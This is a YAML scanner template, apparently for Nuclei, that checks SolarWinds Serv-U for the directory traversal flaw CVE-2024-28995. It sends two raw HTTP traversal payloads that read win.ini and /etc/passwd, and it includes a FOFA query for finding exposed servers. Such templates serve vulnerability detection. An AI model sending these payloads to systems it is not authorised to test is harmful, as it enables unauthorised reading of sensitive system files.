http:
    - matchers:
        - part: body
          type: word
          words:
            - 'root:'
            - ; for 16-bit app support
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET  /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
          Host: {{Hostname}}
        - |
          GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1
          Host: {{Hostname}}
id: SolarWinds-dServ-U-Directory-traversal
info:
    author: Superhero
    description: |-
        fofa: server="Serv-U"
        Serv-U 的目录遍历漏洞（CVE-2024-28995）是由于在处理路径时缺乏适当的验证。攻击者可以通过传递包含 "../" 的路径段绕过路径验证，访问任意文件。
    name: SolarWinds Serv-U 目录遍历漏洞(CVE-2024-28995)
    reference:
        - https://blog.csdn.net/m0_60571842/article/details/139722330
    severity: high
    tags:
        - Directory traversal
        - Serv-U
